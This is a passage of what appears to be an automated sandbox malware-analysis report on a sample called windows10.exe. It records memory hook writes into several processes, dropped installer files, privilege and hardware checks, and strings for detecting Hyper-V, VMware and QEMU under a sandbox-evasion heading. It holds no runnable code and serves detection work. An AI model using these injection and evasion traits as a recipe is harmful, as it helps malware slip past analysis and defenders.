            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8288 base: 7772BA30 value: E9 DA 45 02 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8288 base: 760008 value: E9 8B 8E 01 77
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8288 base: 77778E90 value: E9 80 71 FE 88
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8288 base: 780005 value: E9 8B 4D 2B 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8288 base: 75A34D90 value: E9 7A B2 D4 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8288 base: 790005 value: E9 EB EB 2B 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8288 base: 75A4EBF0 value: E9 1A 14 D4 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8288 base: 39B0005 value: E9 8B 8A C2 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8288 base: 765D8A90 value: E9 7A 75 3D 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 39C0005 value: E9 2B 02 C4 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 76600230 value: E9 DA FD 3B 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 610005 value: E9 8B 2F 15 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 77762F90 value: E9 7A D0 EA 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 3960005 value: E9 2B BA DC 73 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 7772BA30 value: E9 DA 45 23 8C Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 3970008 value: E9 8B 8E E0 73 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 77778E90 value: E9 80 71 1F 8C Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 3990005 value: E9 8B 4D 0A 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 75A34D90 value: E9 7A B2 F5 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 39A0005 value: E9 EB EB 0A 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 75A4EBF0 value: E9 1A 14 F5 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 39C0005 value: E9 8B 8A C1 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 765D8A90 value: E9 7A 75 3E 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 39D0005 value: E9 2B 02 C3 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 76600230 value: E9 DA FD 3C 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 6D0005 value: E9 8B 2F 09 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 77762F90 value: E9 7A D0 F6 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 6F0005 value: E9 2B BA 03 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 7772BA30 value: E9 DA 45 FC 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 860008 value: E9 8B 8E F1 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 77778E90 value: E9 80 71 0E 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 880005 value: E9 8B 4D 1B 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 75A34D90 value: E9 7A B2 E4 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 890005 value: E9 EB EB 1B 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 75A4EBF0 value: E9 1A 14 E4 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 8A0005 value: E9 8B 8A D3 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 765D8A90 value: E9 7A 75 2C 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 8B0005 value: E9 2B 02 D5 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 76600230 value: E9 DA FD 2A 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 6D0005 value: E9 8B 2F 09 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 77762F90 value: E9 7A D0 F6 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 730005 value: E9 2B BA FF 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 7772BA30 value: E9 DA 45 00 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 740008 value: E9 8B 8E 03 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 77778E90 value: E9 80 71 FC 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 870005 value: E9 8B 4D 1C 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 75A34D90 value: E9 7A B2 E3 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 880005 value: E9 EB EB 1C 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 75A4EBF0 value: E9 1A 14 E3 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 890005 value: E9 8B 8A D4 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 765D8A90 value: E9 7A 75 2B 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 8A0005 value: E9 2B 02 D6 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 76600230 value: E9 DA FD 29 8A Jump to behavior
            Source: C:\Windows\System32\msiexec.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exe - Process information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - Process information set: NOGPFAULTERRORBOX
            Source: C:\Windows\System32\cmd.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1CA6817
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 13C3FE1
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1DCD28A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1D5CC61
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1EBB7DD
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1D9F9F2
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1EC362F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1D4FE3A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 13E88A0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1DE4F13
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1C6EB9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1D86EF5
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1DEF32F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1F178CC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1D3DC69
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1F7C9C0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E4EB9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1B9DC69
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1403FE1
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1CAEB9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E46F41
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1F7C237
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E7D28A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1EE8C0A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1DFC9C0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 13EB8A4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1CA2E43
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1C9E90D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1D3AF83
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E4837E
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1F2FE3A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1EB0774
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 20F78CC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1F902EA
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1B9AF83
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1B25C50
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1EFB7DD
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1DF02EA
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E0D28A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1D10774
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 13CB8A4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1C5DC69
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1D55D9C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 14B89BC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1BFA8D4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1B95C50
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E4F9F2
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1D80774
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E9F32F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E602EA
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1BAA8D4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1B1E90D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1DBCC61
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1D836DB
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E4F32F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E2D28A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1F2362F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1BE5C50
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E0AEF7
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1D6837E
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E4FE3A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1D6EB9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E236DB
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1DD0774
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 20178CC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 15C88A0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1F036DB
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1FC4F13
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1F66EF5
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 14689BC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1DFFE3A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1DD36DB
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1D1EB9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E2F32F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1D8FE3A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1F578CC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1D636DB
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1FA40E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1DE6EF5
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1F778CC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E44F13
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 20440E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1EB02EA
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1EE4F13
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1F1238B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 205B321
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 20940E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1521870
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1C0E90D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 201362F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1F3F32F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1DB837E
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 15089BC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E9FE3A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 14DB8A4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1E736DB
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1F34F13
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe - API/Special instruction interceptor: Address: 1DBEB9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_010B5E5A rdtsc 14_2_010B5E5A
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID754.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID6F5.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID7D3.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID686.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID783.tmpJump to dropped file
            Source: C:\Windows\Installer\MSIDD62.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_12-35361
            Source: C:\Windows\Installer\MSIDD92.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_13-35207
            Source: C:\Windows\Installer\MSIDD62.tmpAPI coverage: 4.5 %
            Source: C:\Windows\Installer\MSIDD92.tmpAPI coverage: 4.5 %
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809 (observed 8 times)
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809 (observed 8 times)
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809 (observed 7 times)
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (observed 2 times)
            Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation (observed 7 times)
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: 12_2_004205E9 FindFirstFileExW
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: 13_2_00DB05E9 FindFirstFileExW
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Code function: 14_2_008FD08C FindFirstFileW
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Code function: 26_2_00ADD08C FindFirstFileW
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Code function: 14_2_008FDCF8 GetSystemInfo
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: Datacenter without Hyper-V Core
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004D48000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: #Microsoft-Windows-Hyper-V-VID-Admin
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004C7B000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: 0Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnoseal
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operational
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AdminLMEM`
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-VID-AnalyticLMEMP
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: QEMUU
            Source: windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: VMWARE
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-OperationalLMEMh
            Source: windows10.exe, 00000020.00000003.1622504533.000000007FDC0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: SecureVirtualMachine
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004CCD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: -Microsoft-Windows-Hyper-V-Hypervisor-Analytic
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004C7B000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: 3Microsoft-Windows-Hyper-V-Guest-Drivers/Operational
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004D3A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: *Microsoft-Windows-Hyper-V-Hypervisor-Admin`
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DiagnoseLMEMh
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AdminLMEMX
            Source: windows10.exe, 00000020.00000003.1622504533.000000007FDC0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: fsSecureVirtualMachine
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1649607522.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004C7B000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: 0Microsoft-Windows-Hyper-V-Hypervisor-Operational
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AnalyticLMEMh
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-VID-Admin
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: Datacenter without Hyper-V Full
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: Enterprise without Hyper-V Full
            Source: windows10.exe, 00000020.00000003.1649481472.00000000009CB000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1650085239.00000000009CF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-NETVSC/Diagnostic
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004CCD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: -Microsoft-Windows-Hyper-V-Guest-Drivers/Admin
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Server
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1649607522.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debug
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: Standard without Hyper-V Full
            Source: windows10.exe, 00000020.00000003.1648660506.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648687824.00000000009AD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-NETVSC/DiagnosticLMEMX
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: Enterprise without Hyper-V Core
            Source: windows10.exe, 00000020.00000002.2500690290.00000000009B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
            Source: windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: stVMWare
